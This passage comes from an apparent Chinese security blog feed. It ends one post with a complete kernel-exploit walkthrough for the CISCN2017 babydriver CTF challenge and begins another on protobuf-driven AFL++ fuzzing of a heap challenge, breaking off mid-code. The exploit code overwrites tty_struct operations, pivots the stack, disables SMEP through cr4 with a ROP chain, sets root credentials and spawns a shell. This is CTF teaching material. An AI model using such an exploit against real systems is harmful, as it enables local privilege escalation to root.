class="type">u_int64_t</span> hijacked_stack_addr = ((<span class="type">u_int64_t</span>)fake_tty_ops &amp; <span class="number">0xffffffff</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] hijacked_stack addr: %p\n&quot;</span>, (<span class="type">char</span>*)hijacked_stack_addr);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span>* fake_stack = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">if</span> ((fake_stack = <span class="built_in">mmap</span>(</span><br><span class="line">            (<span class="type">char</span>*)((hijacked_stack_addr &amp; (~<span class="number">0xffff</span>))),  <span class="comment">// addr, 页对齐</span></span><br><span class="line">            <span class="number">0x10000</span>,                                     <span class="comment">// length</span></span><br><span class="line">            PROT_READ | PROT_WRITE,                     <span class="comment">// prot</span></span><br><span class="line">            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,    <span class="comment">// flags</span></span><br><span class="line">            <span class="number">-1</span>,                                         <span class="comment">// fd</span></span><br><span class="line">            <span class="number">0</span>)                                          <span class="comment">// offset</span></span><br><span class="line">        ) == MAP_FAILED)  </span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;mmap&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+]     fake_stack addr: %p\n&quot;</span>, fake_stack);</span><br><span class="line"></span><br><span class="line">    <span class="type">u_int64_t</span>* hijacked_stack_ptr = (<span class="type">u_int64_t</span>*)hijacked_stack_addr;</span><br><span class="line">    <span class="type">int</span> idx = <span class="number">0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = pop_rdi_addr;              <span class="comment">// pop rdi; ret</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0x6f0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  <span class="comment">// mov cr4, rdi; pop rbp; ret;</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                         <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)set_root_cred;</span><br><span class="line">    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                          <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = iretq_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)get_shell;       <span class="comment">// iret_data.rip</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = user_cs;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_eflags;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_rsp;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_ss;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] privilege escape ROP prepared\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 读取 tty_struct 结构体的所有数据</span></span><br><span class="line">    <span class="type">int</span> ops_ptr_offset = <span class="number">4</span> + <span class="number">4</span> + <span class="number">8</span> + <span class="number">8</span>;</span><br><span class="line">    <span class="type">char</span> overwrite_mem[ops_ptr_offset + <span class="number">8</span>];</span><br><span class="line">    <span class="type">char</span>** ops_ptr_addr = (<span class="type">char</span>**)(overwrite_mem + ops_ptr_offset);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">read</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] origin ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 修改并覆写 tty_struct 结构体</span></span><br><span class="line">    *ops_ptr_addr = (<span class="type">char</span>*)fake_tty_ops;</span><br><span class="line">    <span class="built_in">write</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] hacked ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 触发 tty_write</span></span><br><span class="line">    <span class="comment">// 注意使用 write 时， buf 指针必须有效，否则会提前返回 EFAULT</span></span><br><span class="line">    <span class="type">int</span> buf[] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="built_in">write</span>(master_fd, buf, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行效果：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013214429834.png" alt="image-20211013214429834"></p><p>下面是一个简化版的 exploit:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> xchg_eax_esp_addr           0xffffffff8100008a</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> prepare_kernel_cred_addr    0xffffffff810a1810</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> commit_creds_addr           0xffffffff810a1420</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> pop_rdi_addr                0xffffffff810d238d</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swapgs_pop_rbp_addr         0xffffffff81063694          </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> iretq_addr                  0xffffffff814e35ef</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">set_root_cred</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="type">void</span>* (*prepare_kernel_cred)(<span class="type">void</span>*) = prepare_kernel_cred_addr;</span><br><span class="line">    <span class="built_in">void</span> (*commit_creds)(<span class="type">void</span>*) = commit_creds_addr;</span><br><span class="line">    <span class="built_in">commit_creds</span>(<span class="built_in">prepare_kernel_cred</span>(<span class="literal">NULL</span>));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">get_shell</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">long</span> user_cs, user_eflags, user_rsp, user_ss;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">save_iret_data</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%cs, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_cs));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pushf&quot;</span>);</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pop %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_eflags));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%rsp, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_rsp));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%ss, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_ss));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">save_iret_data</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> fd1 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0x2e0</span>);</span><br><span class="line">    <span class="built_in">close</span>(fd1);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> master_fd = <span class="built_in">open</span>(<span class="string">&quot;/dev/ptmx&quot;</span>, O_RDWR);</span><br><span class="line"></span><br><span class="line">    <span class="type">u_int64_t</span> fake_tty_ops[] = &#123;</span><br><span class="line">        <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>,</span><br><span class="line">        xchg_eax_esp_addr</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="type">u_int64_t</span> hijacked_stack_addr = ((<span class="type">u_int64_t</span>)fake_tty_ops &amp; <span class="number">0xffffffff</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span>* fake_stack = <span class="built_in">mmap</span>(</span><br><span class="line">            (hijacked_stack_addr &amp; (~<span class="number">0xffff</span>)),</span><br><span class="line">            <span class="number">0x10000</span>,</span><br><span class="line">            PROT_READ | PROT_WRITE,                    </span><br><span class="line">            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,</span><br><span class="line">            <span class="number">-1</span>,</span><br><span class="line">            <span class="number">0</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="type">u_int64_t</span> rop_chain_mem[] = &#123;</span><br><span class="line">        pop_rdi_addr, <span class="number">0x6f0</span>, </span><br><span class="line">        mov_cr4_rdi_pop_rbp_addr, <span class="number">0</span>, set_root_cred,</span><br><span class="line">        swapgs_pop_rbp_addr, <span class="number">0</span>, </span><br><span class="line">        iretq_addr, get_shell, user_cs, user_eflags, user_rsp, user_ss</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="built_in">memcpy</span>(hijacked_stack_addr, rop_chain_mem, <span class="built_in">sizeof</span>(rop_chain_mem));</span><br><span class="line">    </span><br><span class="line">    <span class="type">int</span> ops_ptr_offset = <span class="number">4</span> + <span class="number">4</span> + <span class="number">8</span> + <span class="number">8</span>;</span><br><span class="line">    <span class="type">char</span> overwrite_mem[ops_ptr_offset + <span class="number">8</span>];</span><br><span class="line">    <span class="type">char</span>** ops_ptr_addr = overwrite_mem + ops_ptr_offset;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">read</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line">    *ops_ptr_addr = fake_tty_ops;</span><br><span class="line">    <span class="built_in">write</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> buf[] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="built_in">write</span>(master_fd, buf, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="五、参考">五、参考</h2><ul><li><a href="https://wiki.x10sec.org/pwn/linux/kernel-mode/environment/readme/">CTF Wiki - Linux Platform Kernel Mode</a></li><li><a href="https://linuxlink.timesys.com/docs/how_to_use_kgdb">How to use KGDB - LinuxLink</a></li><li><a href="https://d1nn3r.github.io/2019/07/27/kernelexp/">kernelexp学习笔记</a></li><li><a href="https://blog.csdn.net/m0_38100569/article/details/100673103">【Writeup】CISCN2017_Pwn_babydriver - CSDN</a></li><li><em><a href="https://lwn.net/Kernel/LDD3/">Linux Device Drivers, Third Edition - Chapter 3 Char Drivers</a></em></li><li><a href="https://blog.csdn.net/tq384998430/article/details/54342044">Linux下使用class_create,device_create自动创建设备文件结点</a></li><li><a href="https://www.cnblogs.com/bittorrent/p/3789193.html">Linux下tty/pty/pts/ptmx详解</a></li><li><a href="https://www.cnblogs.com/dux2016/articles/6236131.html">Linux终端简介与pty编程</a></li><li>Linux manual page</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;内核 CTF 入门，主要参考 &lt;a href=&quot;https://wiki.x10sec.org/pwn/linux/kernel-mode/environment/readme/&quot;&gt;CTF-Wiki&lt;/a&gt;。&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="kernel" scheme="https://kiprey.github.io/tags/kernel/"/>
    
  </entry>
  
  <entry>
    <title>使用 protobuf &amp; AFLplusplus 进行简易 CTF 自动化 fuzz</title>
    <link href="https://kiprey.github.io/2021/09/protobuf_ctf_fuzz/"/>
    <id>https://kiprey.github.io/2021/09/protobuf_ctf_fuzz/</id>
    <published>2021-09-26T05:39:22.000Z</published>
    <updated>2025-11-24T03:59:40.069Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>看 <a href="https://github.com/google/fuzzing/blob/master/docs/structure-aware-fuzzing.md">fuzz 的结构感知</a> 时遇到了 protobuf，觉得很有意思，于是尝试使用 protobuf 来进行快速简易的 CTF fuzz。</p><p>以下以 <a href="https://ctftime.org/task/16415">TCTF2021-babyheap2021</a> 为例，来简单说明一下自动化步骤。</p><p>这里主要用到以下项目：</p><ul><li><a href="https://github.com/AFLplusplus/AFLplusplus">AFL++</a>，其中的 qemu mode + qasan</li><li><a href="https://github.com/thebabush/afl-libprotobuf-mutator">afl-libprotobuf-mutator</a></li></ul><p>需要注意的是，该 fuzz 目前处于实验性版本，可能不太稳定，仅作为学习研究使用。</p><span id="more"></span><h2 id="二、操作流程">二、操作流程</h2><h3 id="1-下载依赖">1. 下载依赖</h3><p>git clone 下 AFL++ 和 afl-libprotobuf-mutator （链接在上面）即可。</p><h3 id="2-配置-afl-libprotobuf-mutator">2. 配置 afl-libprotobuf-mutator</h3><ul><li><p>首先，用 ida64 打开 babyheap2021, F5阅读伪代码并总结其输入模板，最后用 protobuf 描述输入结构：</p><blockquote><p>这类菜单题的输入模板大体上比较固定，下面的代码随便改改就能换一道题目用用。</p></blockquote><p>代码编写完成后，覆盖保存至 <code>afl-libprotobuf-mutator/gen/out.proto</code>。注意<strong>路径必须完成一致</strong>，若遇到重名文件 out.proto 则直接替换。</p><blockquote><p>如果不会写 protobuf 描述的话，可以看看这个 <a href="https://developers.google.com/protocol-buffers/docs/tutorials">Protocol Buffers Tutorials</a>。</p></blockquote><figure class="highlight protobuf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// out.proto</span></span><br><span class="line">syntax = <span class="string">&quot;proto2&quot;</span>;</span><br><span class="line"><span class="keyword">package</span> menuctf;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">AllocChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">1</span>];</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> size = <span class="number">2</span>;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">string</span> content = <span class="number">3</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">UpdateChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">2</span>];</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> idx = <span class="number">2</span>;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> size = <span class="number">3</span>;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">string</span> content = <span class="number">4</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">DeleteChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">3</span>];</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> idx = <span class="number">2</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">ViewChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">4</span>];</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> idx = <span class="number">2</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">ExitChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">5</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Our address book file is just one of these.</span></span><br><span class="line"><span class="keyword">message </span><span class="title class_">ChoiceList</span> &#123;</span><br><span class="line">  <span class="keyword">message </span><span class="title class_">Choice</span> &#123;</span><br><span class="line">    <span class="keyword">oneof</span> the_choice&#123;</span><br><span class="line">      AllocChoice alloc_choice = <span class="number">1</span>;</span><br><span class="line">      UpdateChoice update_choice = <span class="number">2</span>;</span><br><span class="line">      DeleteChoice delete_choice = <span class="number">3</span>;</span><br><span class="line">      ViewChoice view_choice = <span class="number">4</span>;</span><br><span class="line">      ExitChoice exit_choice = <span class="number">5</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">repeated</span> Choice choice = <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>到了这里，我们需要理一理思路。对于CTF题来说，大多都是直接从 stdin 中获取输入的<strong>文本数据</strong>。因此首先，我们需要编写 <code>Protobuf::Message</code> 转<strong>常规输入字符串</strong>的代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">ProtoToDataHelper</span><span class="params">(std::stringstream &amp;out, <span class="type">const</span> google::protobuf::Message &amp;msg)</span> </span>&#123;</span><br><span class="line">  <span class="type">const</span> google::protobuf::Descriptor *desc = msg.<span class="built_in">GetDescriptor</span>();</span><br><span class="line">  <span class="type">const</span> google::protobuf::Reflection *refl = msg.<span class="built_in">GetReflection</span>();</span><br><span class="line"></span><br><span class="line">  <span class="type">const</span> <span class="type">unsigned</span> fields = desc-&gt;<span class="built_in">field_count</span>();</span><br><span class="line">  <span class="comment">// std::cout &lt;&lt; msg.DebugString() &lt;&lt; std::endl;</span></span><br><span class="line">  <span class="keyword">for</span> (<span class="type">unsigned</span> i = <span class="number">0</span>; i &lt; fields; ++i) &#123;</span><br><span class="line">    <span class="type">const</span> google::protobuf::FieldDescriptor *field = desc-&gt;<span class="built_in">field</span>(i);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 对于单个 choice</span></span><br><span class="line">    <span class="keyword">if</span> (field-&gt;<span class="built_in">cpp_type</span>() == google::protobuf::FieldDescriptor::CPPTYPE_MESSAGE) &#123;</span><br><span class="line">      <span class="comment">// 如果当前是 choice list</span></span><br><span class="line">      <span class="keyword">if</span> (field-&gt;<span class="built_in">is_repeated</span>()) &#123;</span><br><span class="line">        <span class="type">const</span> google::protobuf::RepeatedFieldRef&lt;google::protobuf::Message&gt; &amp;ptr = refl-&gt;<span class="built_in">GetRepeatedFieldRef</span>&lt;google::protobuf::Message&gt;(msg, field);</span><br><span class="line">        <span class="comment">// 将每个 choice 打出来</span></span><br><span class="line">        <span class="keyword">for</span> (<span class="type">const</span> <span class="keyword">auto</span> &amp;child : ptr) &#123;</span><br><span class="line">          <span class="built_in">ProtoToDataHelper</span>(out, child);</span><br><span class="line">          out &lt;&lt; <span class="string">&quot;\n&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">      <span class="comment">// 如果当前是某个子 choice</span></span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> (refl-&gt;<span class="built_in">HasField</span>(msg, field)) &#123;</span><br><span class="line">        <span class="type">const</span> google::protobuf::Message &amp;child = refl-&gt;<span class="built_in">GetMessage</span>(msg, field);</span><br><span class="line">        <span class="built_in">ProtoToDataHelper</span>(out, child);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125; </span><br><span class="line">    <span class="comment">// 对于单个 field</span></span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (field-&gt;<span class="built_in">cpp_type</span>() == google::protobuf::FieldDescriptor::CPPTYPE_INT32) &#123;</span><br><span class="line">      out &lt;&lt; refl-&gt;<span class="built_in">GetInt32</span>(msg, field);</span><br><span class="line">      <span class="keyword">if</span>(i &lt; fields - <span class="number">1</span>) </span><br><span class="line">        out &lt;&lt; <span class="string">&quot; &quot;</span>;</span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (field-&gt;<span class="built_in">cpp_type</span>() == google::protobuf::FieldDescriptor::CPPTYPE_STRING) &#123;</span><br><span class="line">      out &lt;&lt; refl-&gt;<span class="built_in">GetString</span>(msg, field);</span><br><span class="line">      <span class="keyword">if</span>(i &lt; fields - <span class="number">1</span>) </span><br><span class="line">        out &lt;&lt; <span class="string">&quot; &quot;</span>;</span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="built_in">abort</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>之后，参照 AFL++ 的 <a href="https://github.com/AFLplusplus/AFLplusplus/blob/dev/docs/custom_mutators.md">Custom Mutators in AFL++</a>，完成一些必要的 custom mutate 函数。</p><p>这里我们需要完成以下几种函数：</p><ul><li><code>void *afl_custom_init(void *afl, unsigned int seed)</code>：在执行 custom mutate 前需要执行的初始化操作，这里只需初始化一下随机种子。</li><li><code>size_t afl_custom_fuzz(void *data, unsigned char *buf, size_t buf_size, unsigned char **out_buf, unsigned char *add_buf, size_t add_buf_size, size_t max_size)</code> ：变异逻辑，在该代码中编写自己的变异逻辑。</li><li><code>size_t afl_custom_post_process(void* data, uint8_t *buf, size_t buf_size, uint8_t **out_buf)</code>：将 protobuf::Message 格式的二进制数据转换成 target 可读的数据。</li><li><code>void afl_custom_deinit(void *data)</code>：变异完成后需要做的事情，目前没有什么事情需要在这里进行处理。</li><li><code>int32_t afl_custom_init_trim(void *data, uint8_t *buf, size_t buf_size)</code>：自定义 trim 逻辑的初始化。为了<strong>防止 trim 逻辑破坏 protobuf::Message 的二进制数据</strong>，影响正常的 Parse 过程，这里可以让该函数直接返回0，跳过每次的 trim 阶段。</li><li><code>size_t afl_custom_trim(void *data, uint8_t **out_buf)</code>：自定义 trim 逻辑。由于<code>afl_custom_init_trim</code>函数返回0，因此实际上该函数不会被调用，但我们仍然必须声明该函数以启用自定义 trim 逻辑。</li></ul><blockquote><p>需要注意的是，这一整个 <code>extern &quot;C&quot;</code> 的代码以及内部用到的 <code>ProtoToDataHelper</code> 函数的代码，必须全部放在 <code>afl-libprotobuf-mutator/src/mutate.cc</code> 中。</p><p>由于 afl-libprotobuf-mutator 较为久远，因此大部分 AFL++ 相关的接口需要修改亿下。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span 